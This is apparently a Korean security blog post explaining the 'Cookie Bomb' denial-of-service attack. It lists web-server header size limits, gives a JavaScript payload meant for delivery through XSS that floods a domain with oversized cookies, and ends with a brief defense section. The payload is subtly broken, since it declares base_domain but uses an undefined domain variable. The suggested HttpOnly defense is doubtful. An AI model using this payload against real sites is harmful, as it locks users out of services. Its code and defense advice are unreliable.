728x90
반응형
Cookie Bomb Attack
Cookie Bomb는 비정상적인 크기의 쿠기 값으로 생성하여 공격하는 방법.
일반적인 HTTP Request 프로토콜에서는 Request/Respons로 나누어지고 각각 Header/Body로 나누어진다.
그 중에 Request Header가 너무 클 경우 413(Request Entity Too Large) 혹은 400(Bad Request) 에러를 발생 시킨다.
공격을 해소하기 위해서는 Client 쿠키가 초기화 하지 않는 이상 계속 이어진다.
많이 사용 되는 Web Server의 Header 허용 사이즈
Web Server | Size |
Nginx | 4KB ~ 8 KB |
Apache Web Server | 8KB |
Tomcat | 8KB ~ 48KB |
공격 방법
XSS나 유저 트래킹 등을 통해서 공격을 진행 할 수 있다.
var base_domain = "example.com";
var pollution = Array(4000).join('a');
for(var i=0;i<100;i++){
document.cookie = `${btoa(i)}=${btoa(pollution + String(i))};domain=${domain}`;
}
여기서 example.com의 하위 도메인이 있다고 가정하면 .example.com으로 설정하여 하위 도메인까지 영향을 미치도록 할 수도 있다.
방어 방법
Cookie HttpOnly 설정을 하거나 HTTP Error redirect 페이지에서 Cookie 초기화 하는 방법 등이 있다.
728x90
반응형
'IT > Web' 카테고리의 다른 글
[Web Hacking] Challange 24 풀이 (0) | 2023.05.05 |
---|---|
[Web Hacking] Challange 16 풀이 (0) | 2023.05.01 |
[Web Hacking] Challange 26 풀이 (0) | 2023.04.30 |
[Web Hacking] Challange 15 풀이 (0) | 2023.04.30 |
[보안] XSS HTML Image 태그 주의할 점 - 2 (0) | 2023.04.13 |